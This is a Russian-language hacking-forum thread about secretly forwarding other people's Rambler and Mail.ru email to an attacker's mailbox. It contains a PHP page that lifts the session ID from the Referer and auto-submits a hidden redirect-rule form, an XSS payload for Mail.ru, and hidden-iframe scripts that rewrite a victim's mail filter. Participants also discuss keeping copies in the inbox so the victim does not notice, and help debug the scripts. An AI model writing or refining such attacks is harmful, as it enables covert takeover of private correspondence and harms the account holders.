Что то раньше катил метод про переадресацию на другой ящик с ящика рамблера щас это походу прикрыли может можно ещё как то сделать так?
И ещё как на mail.ru переадресацию сделать?
Всем заранее спасибо.

на рамблере принцип ослался тотже

Майор объясни пожалуйсто что надо залить на сайт какой html код? Чтобы потом через тег img всё сработало напиши код html заранее спасибо.

<?
$nomer=strpos("$HTTP_REFERER","Session/")+8;
$id=substr("$HTTP_REFERER","$nomer",36);
echo "
<html><FORM name='forma' ACTION='http://mail.rambler.ru/Session/{$id}/Rules.wssp' method='post' enctype='multipart/form-data'>
<INPUT type='hidden' name='FormCharset' value='windows-1251'>
<INPUT TYPE='checkbox' NAME='Redirect' VALUE='1' class='box' CHECKED>
<TEXTAREA style='width:0%;' NAME='RedirectText' ROWS='0' COLS='0'>TVOE_MILO</TEXTAREA>
<INPUT TYPE='hidden' NAME='RedirKeep' VALUE='1' class='box' CHECKED>
<INPUT TYPE='hidden' NAME='RedirHuman' VALUE='0' class='box'>
<INPUT TYPE='hidden' NAME='KeepToAndCc' VALUE='1' class='box' CHECKED>
<INPUT type='hidden' name='Update' VALUE='1' class='box' CHECKED>
</form>
<script LANGUAGE=javascript>
document.forma.submit();
</SCRIPT> ";
?>


Вот как-то так :)
PS причем эту страничку придётся запихнуть в iframe

Майор значит вон тот код там надо своё мыло вписать которое на рамблере потом всё это сохранить в .php потом загрузить на сайт а какое письмо надо писать раньше же <img> работал <iframe src="adres.php"></iframe> или как? Объясни пожалуйсто

А про майл.ру есть?

Майор значит вон тот код там надо своё мыло вписать которое на рамблере потом всё это сохранить в .php потом загрузить на сайт а какое письмо надо писать раньше же <img> работал <iframe src="adres.php"></iframe> или как? Объясни пожалуйсто
найди там xss и зделай как здесь в примере с mail.ru
http://antichat.ru/txt/hmail/

А про майл.ру есть?
А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.

4e и Майор
На mail.ru пересылку можно в фильтра задать.

А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.
да, там подругому малёк id придётся получить, потом посмотрю когда время будет

4e и Майор
На mail.ru пересылку можно в фильтра задать.

тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...

Майор ок посмотришь напишешь сюда или сделай видео если не трудно.
тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...
А на майл.ру как сделать чтобы переадресация шла с ящика майл на мой ящик а на тот ящик ничего не приходило? Напиши код пожалуйсто

тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...

Ты ошибаешься :)
Там есть галочка оставлять копии в папке такой-то, посмотри настройку фильтра пересылки.

Master Of Decption
Точно :)
PS смотрел меню давно и мельком


А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.

что и xss нашёл :) ?
там видимо фильтры нормальные поставили и не одна старая xss не работает ...

Господа, большая просьба сообщить о действующих способах на сегодняшний день (на Rambler.ru).
Если паблика не хотите, можно в ПМ. Я не работаю на Rambler ( это можно легко проверить с большой вероятностью), мне просто нужно хотяб поиметь возможность просматривать письма другого ящика (пароль узнавать не обязательно)

Мож кто-нить чё-нить ответит ? :d

Xeeper
если по-простому, ты можешь общаться с человеком в инете, и попросить его проверить свой ящик на рамблере, и ПОКА ОН В ПОЧТЕ быстро воспользоваться его сессией. Подробно расписывать лишний раз нет смысла, тут много было написано

Я как раз и имею ввиду те способы о которых тут было много написанно. Работают ли они на сегодняшний день или все дыры уже прикрыты ? и остаётся тока соц.инженерия ?

Наскока я знаю - все прикрыто. Мне вот тоже очень нужно. Пробовал все. МИМО!

что и xss нашёл :) ?
там видимо фильтры нормальные поставили и не одна старая xss не работает ...
Там и так фильтры нормальные стояли. А которую мы нашли (не помню уже какую точно), тоже теперь не работает?

проблема в том что тама все xss прекрыли, атребут src во всех тегах фильтруется очень чётко

А нового ничего не копали? Если есть эксперты в этом деле...
Можно было бы объединить усилия и в несколько рук разгрести еще чего...

хехе
ну для начала объявляется типа конкурс на нахождение Xss в письмах) Интересно, найдет кто-нибудь? Мне кажется решаемый вопрос-то в принципе)

Всем привет!
хехе
ну для начала объявляется типа конкурс на нахождение Xss в письмах) Интересно, найдет кто-нибудь? Мне кажется решаемый вопрос-то в принципе)
конкурс? А какой приз?
Я нашел рабочий XSS на mail.ru в атрибуте image src=

Всем привет!

конкурс? А какой приз?
Я нашел рабочий XSS на mail.ru в атрибуте image src=
я имел ввиду "типа конкурса", внутри раздела емэйл и в рамках обсуждения рамблера)
приза наверна никакого, кроме признания среди вас, специалистов
Кстати на мэйл.ру не совсем актуально. Раз уж тема о чтении чужих писем, то на мэйле скрипт не нужн для организации пересылки, там все через простой запрос делается. А вот на рамблере нужен, и тем интереснее, что там все шито-крыто, защищено от XSS, поэтому повторяюсь:
все ищем на рамблере способ запустить JavaScript внутри письма)

Нормальный человек нашедший уязвимость java не будет кидать е сюда.
Какой нить идиот сделат видео и кинет его сюдам ламерам в тот же дегь ету дыру приктоют.

Такие уязвимости либо испоьзуют в своих целях либо продают за деньги.
Но никак не кидают на этот форум,где 98 % сидит ламеров, которые ничего кроме как подставить по аналогии не могут.

Кстати на мэйл.ру не совсем актуально. Раз уж тема о чтении чужих писем, то на мэйле скрипт не нужн для организации пересылки, там все через простой запрос делается.
На скока я знаю простой запрос для прописки фильтра уже не работает на майле больше месяца. Если знаешь, как правильно выглядит этот запрос, плиз запости здесь.

На скока я знаю простой запрос для прописки фильтра уже не работает на майле больше месяца. Если знаешь, как правильно выглядит этот запрос, плиз запости здесь.
нынче система проверяет REFERER

надо писать скрипт который отправляет заголовок

Я только не понял есть всетаки Xss или нет?
И кто возьмется написать скрапт?

mail.ru
<image src=JaVaScRiP:alert()>

Майор Молодца :)))))
Ты тока хорошо подумал ?

это общеизвестная xss и это не секрет

хехе, Майор непонятно,
имеется ввиду что на рамблере что ли работает это?

Я имел в виду нечто другое. ))

mail.ru
<image src=JaVaScRiP:alert()>
На майле работает, а на рамблере нет :(
Тока ошибся на один знак JaVaScRiPt

мне очень нужно узнать пороль к мылу , с чего начинать?

мне очень нужно узнать пороль к мылу , с чего начинать?
прочесть послнедние 5 тем в этом разделе ;)

угу я уже тут столько прочла, что мне сниться этот форум начал. И сделала один большой вывод... ничего у меня самой не получиться... потому как я ничего не умею, а извесные шаблоны уже не работают, вот сижу и гадаю что бы придумать...

Сницца - это хорошо. =))
Да рановато пока новичком вникать в суть Xss, если они не знают что это такое! Всё просто - без знаний ничего не будет. Поройтесь в поисковике, узнайте больше про Xss, если вам это интересно, конечно..

Ага узнавала, читала... а толку мало... ну и что что я узнала, что это такое. Я же не могу это использовать так, как мне нужно! :(((

Ребя хватит флеймить в теме, создавайте новые топики по отдельным вопросам, а то буду удалять, мне пофиг, я модератор

При загрузке страницы в <iframe src="http://win.mail.ru/cgi-bin/editfilter"> она открывается, если ссылка на страницу с этим ифрейм была запущена прям с почты - у меня во всяком случаи она всегда туды загружается...
Но скрипт который я пробовал написать почему-то не пашет, хотя в оффлайн у меня все работает :confused: .Может кто найдет где я ошибся...
Вот и сам скрипт:

<html>
<head><title>}{@|&lt;e® &nbsp;&nbsp;&nbsp; ;-)</title></head>
<script language="JavaScript">
function hackit() {

editf.document.Compose.Size.value="10000"
editf.document.Compose.Action[2].checked=true;
editf.document.Compose.Forward.value="my_mail@mail.ru";
editf.document.Compose.KeepMail[1].checked=true;
editf.document.Compose.submit();

}
</script>
<body>
<iframe width=0 height=0 src="http://win.mail.ru/cgi-bin/editfilter" name="editf" onLoad='hackit()' ></iframe>
</body>


</html>

что-то непонятно зачем фрейм создавать, если можно форму перенести просто

JazzzSummerMan
А по подробней...если можно форму перенести просто
А если именно в таком виде, то в чем ошибка?
Почему в оффлайн работает все? а в онлайн, при загрузке страницы в ифрейм, нет?

Так, понял о чем ты.. Значит форму бесполезно переносить на страницу, потому что реферер проверяется. А что именно не получается у тебя в онлайне? Ошибка доступа к элементам фрейма?

скрипт надо имхо заносить в onLoad твоего фрейма, тогда заработает

Дело в том, что я не знаю в чем это ошибка заключается...
Но наврятле в элементах фрейма - ведь в оффлайн не выдает ошибки...а точнее при выполнении скрипта в оффлайн, доступ к элементам фрейа осуществляются и вроде все работает, но в строке статуса написано: Done, but with erors.

скрипт сразу выполняется, а содержимое страницы фильтров еще не загружено, поэтому и ошибка. Сделай так <iframe src="............../editfilter" OnLoad="javascript.......">

скрипт надо имхо заносить в onLoad твоего фрейма, тогда заработает
Мне что весь скрипт поместить в onLoad?
Напиши по подробней...

"скрипт надо имхо заносить в onLoad твоего фрейма, тогда заработает"
"Сделай так <iframe src="............../editfilter" OnLoad="javascript.......">"
два раза уже написал,к уда подробнее

Sorry.Не заметил... Сейчас попробую.
Хотя не понимаю почему это скрипт раньше выполянется....

Опять та же история...
При вставке следущего скрипта:
<html>
<head><title>}{@|&lt;e® &nbsp;&nbsp;&nbsp; ;-)</title></head>

<body>
<iframe width=0 height=0 src="http://win.mail.ru/cgi-bin/editfilter" name="editf" onLoad="JavaScript:editf.document.Compose.Size.value='1000 0';
editf.document.Compose.Action[2].checked=true;
editf.document.Compose.Forward.value='my_mail@mail .ru';
editf.document.Compose.KeepMail[1].checked=true;
editf.document.Compose.submit();" ></iframe>
</body>


</html>
:confused:

Здесь уже дело техники. Скрипт надо немного переработать. У тебя вон зачем-то перенос строк идет и все такое